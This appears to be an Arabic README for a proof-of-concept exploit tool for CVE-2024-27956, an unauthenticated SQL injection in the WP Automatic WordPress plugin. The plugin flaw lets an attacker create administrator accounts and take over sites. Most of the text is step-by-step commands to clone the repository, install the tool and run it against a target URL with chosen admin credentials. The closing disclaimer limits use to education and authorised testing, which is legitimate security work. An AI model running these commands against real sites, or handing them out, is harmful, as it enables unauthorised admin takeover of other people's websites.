
CVE-2024-27956 - أداة استغلال SQL Injection لـ WP Automatic
أداة استغلال إثبات المفهوم للثغرة الأمنية لحقن SQL في إضافة WP Automatic (CVE-2024-27956) التي تؤثر على مواقع WordPress.
يستهدف هذا الاستغلال ثغرة حقن SQL حرجة غير موثقة في إضافة WP Automatic (الإصدارات < 3.9.2.0) لنظام WordPress. تسمح الثغرة للمهاجمين بإنشاء مستخدمين إداريين والحصول على سيطرة كاملة على المواقع الضعيفة.
git clone https://github.com/devsec23/CVE-2024-27956.git
cd CVE-2024-27956
pip install -r requirements.txt
python3 exploit.py http://vulnerable-site.com
python3 exploit.py http://vulnerable-site.com -u admin -p P@ssw0rd123
python3 exploit.py http://vulnerable-site.com --proxy http://127.0.0.1:8080
positional arguments:
url رابط WordPress الهدف
optional arguments:
-h, --help عرض رسالة المساعدة هذه والخروج
-u USERNAME, --username USERNAME
اسم المستخدم للحساب الإداري الجديد
-p PASSWORD, --password PASSWORD
كلمة المرور للحساب الإداري الجديد
هذه الأداة مقدمة لأغراض تعليمية واختبار الاختراق المصرح به فقط. المطور غير مسؤول عن أي إساءة استخدام لهذا البرنامج. احصل دائمًا على التصريح المناسب قبل اختبار أي أنظمة.
هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للتفاصيل.